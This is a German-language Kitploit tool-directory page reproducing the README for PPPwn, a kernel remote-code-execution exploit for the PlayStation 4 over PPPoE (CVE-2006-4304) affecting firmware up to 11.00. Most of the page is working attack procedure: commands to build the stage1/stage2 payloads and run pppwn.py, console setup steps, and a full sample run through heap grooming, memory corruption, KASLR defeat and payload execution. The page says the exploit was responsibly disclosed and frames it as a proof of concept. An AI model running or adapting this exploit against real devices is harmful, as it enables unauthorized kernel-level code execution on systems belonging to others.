Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PPPwn — PPPwn – PlayStation 4 PPPoE RCE | Kitploit
Tools/GitHubGitHub/theofficialflow/pppwn
ExploitationPayload-EntwicklungBinary-Exploitation
GitHubtheofficialflow/pppwn

PPPwn

PPPwn – PlayStation 4 PPPoE RCE

Repository anzeigen
3.0k4146vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PPPwn - PlayStation 4 PPPoE RCE

PPPwn ist ein Kernel-Exploit zur Remote-Codeausführung für PlayStation 4 bis FW 11.00. Dies ist ein Proof-of-Concept-Exploit für CVE-2006-4304, der verantwortungsvoll an PlayStation gemeldet wurde.

Unterstützte Versionen sind:

  • FW 7.00 / 7.01 / 7.02
  • FW 7.50 / 7.51 / 7.55
  • FW 8.00 / 8.01 / 8.03
  • FW 8.50 / 8.52
  • FW 9.00
  • FW 9.03 / 9.04
  • FW 9.50 / 9.51 / 9.60
  • FW 10.00 / 10.01
  • FW 10.50 / 10.70 / 10.71
  • FW 11.00
  • weitere können hinzugefügt werden (PRs sind willkommen)

Der Exploit gibt auf deiner PS4 nur PPPwned als Proof-of-Concept aus. Um Mira oder ähnliche Homebrew-Enabler zu starten, muss das stage2.bin-Payload angepasst werden.

Voraussetzungen

  • Ein Computer mit einem Ethernet-Port
    • Ein USB-Adapter funktioniert auch
  • Ethernet-Kabel
  • Linux
    • Du kannst VirtualBox verwenden, um eine Linux-VM mit Bridged Adapter als Netzwerkadapter zu erstellen, um den Ethernet-Port in der VM zu nutzen.
  • Python3 und gcc installiert

Verwendung

Auf deinem Computer klonst du das Repository:

root@kitploit:~
git clone --recursive https://github.com/TheOfficialFloW/PPPwn
Tool herunterladen

Wechsle in das geklonte Repository:

root@kitploit:~
cd PPPwn

Installiere die Abhängigkeiten:

root@kitploit:~
sudo pip install -r requirements.txt

Kompiliere die Payloads:

root@kitploit:~
make -C stage1 FW=1100 clean && make -C stage1 FW=1100
make -C stage2 FW=1100 clean && make -C stage2 FW=1100

Für andere Firmwares, z. B. FW 9.00, übergib FW=900.

FÜHRE den Exploit noch NICHT aus (drücke noch nicht die Eingabetaste), sondern bereite diesen Befehl in deiner Eingabeaufforderung vor (siehe ifconfig für die richtige Schnittstelle):

root@kitploit:~
sudo python3 pppwn.py --interface=enp0s3 --fw=1100

Für andere Firmwares, z. B. FW 9.00, übergib --fw=900.

Auf deiner PS4:

  • Gehe zu Settings und dann zu Network

  • Wähle Set Up Internet connection und entscheide dich für Use a LAN Cable

  • Wähle Custom-Einrichtung und für IP Address Settings die Option PPPoE

  • Gib beliebige Werte für PPPoE User ID und PPPoE Password ein

  • Wähle Automatic für DNS Settings und MTU Settings

  • Wähle Do Not Use für Proxy Server

  • Drücke nun gleichzeitig auf deinem Controller die 'X'-Taste bei Test Internet Connection und auf deiner Tastatur die 'Enter'-Taste (auf dem Computer, auf dem dein Python-Skript bereit ist).

WARTE IMMER, bis die Konsole die Meldung "Cannot connect to network: (NW-31274-7)" anzeigt, bevor du diese PPPOE-Injection erneut versuchst.

Wenn der Exploit fehlschlägt oder die PS4 abstürzt, kannst du die Internet-Einrichtung überspringen und einfach auf Test Internet Connection klicken. Beende das pppwn.py-Skript und führe es auf deinem Computer erneut aus, und klicke dann auf deiner PS4 auf Test Internet Connection: immer gleichzeitig.

Wenn der Exploit funktioniert, solltest du eine Ausgabe ähnlich der folgenden sehen, und auf deiner PS4 sollte Cannot connect to network. gefolgt von PPPwned erscheinen – oder umgekehrt.

Beispielausführung

root@kitploit:~
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow
[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin

[+] STAGE 0: Initialization
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 07:ba:be:34:d6:ab
[+] AC cookie length: 0x4e0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[*] Waiting for interface to be ready...
[+] Target IPv6: fe80::2d9:d1ff:febc:83e4
[+] Heap grooming...done

[+] STAGE 1: Memory corruption
[+] Pinning to CPU 0...done
[*] Sending malicious LCP configure request...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...
[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141

[+] STAGE 2: KASLR defeat
[*] Defeating KASLR...
[+] pppoe_softc_list: 0xffffffff884de578
[+] kaslr_offset: 0x3ffc000

[+] STAGE 3: Remote code execution
[*] Sending LCP terminate request...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634beba00
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] Source MAC: 97:df:ea:86:ff:ff
[+] AC cookie length: 0x511
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Triggering code execution...
[*] Waiting for stage1 to resume...
[*] Sending PADT...
[*] Waiting for PADI...
[+] pppoe_softc: 0xffffabd634be9200
[+] Target MAC: xx:xx:xx:xx:xx:xx
[+] AC cookie length: 0x0
[*] Sending PADO...
[*] Waiting for PADR...
[*] Sending PADS...
[*] Waiting for LCP configure request...
[*] Sending LCP configure ACK...
[*] Sending LCP configure request...
[*] Waiting for LCP configure ACK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure NAK...
[*] Waiting for IPCP configure request...
[*] Sending IPCP configure ACK...
[*] Sending IPCP configure request...
[*] Waiting for IPCP configure ACK...

[+] STAGE 4: Arbitrary payload execution
[*] Sending stage2 payload...
[+] Done!

Hinweise für Mac-Benutzer mit Apple Silicon (arm64 / aarch64)

Der Code lässt sich auf Apple Silicon nicht kompilieren und benötigt die AMD64-Architektur. Es gibt einen Workaround mit docker, um die benötigten Binärdateien zu erstellen. Du klonst dieses Repository auf dein Mac-System und führst dann aus dem Repository-Ordner ./build-macarm.sh aus. Dadurch werden die Binärdateien für PS4 FW 1100 erstellt und die erforderlichen Dateien in die richtigen Ordner gelegt. Um die Binärdateien für eine andere Version zu erstellen, z. B. 900, führe den Befehl wie folgt aus: ./build-macarm.sh 900. Nach dem Erstellen kopierst du diese Ordnerstruktur in die Linux-VM und führst sie wie oben beschrieben aus. Getestet wurde dies mit VMware Fusion 13.5.1, mit Ubuntu 24.04 als VM-Gast und macOS 14.4.1 als Host-System.